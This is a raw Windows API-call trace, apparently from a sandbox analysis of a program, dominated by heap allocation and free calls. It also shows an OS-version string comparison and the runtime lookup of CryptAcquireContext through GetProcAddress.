hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.218] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.219] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.219] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.219] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0265.220] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.220] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.225] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0265.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0265.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.228] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0265.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0265.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0265.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466e10 [0265.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0265.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.229] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0265.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0265.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0265.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 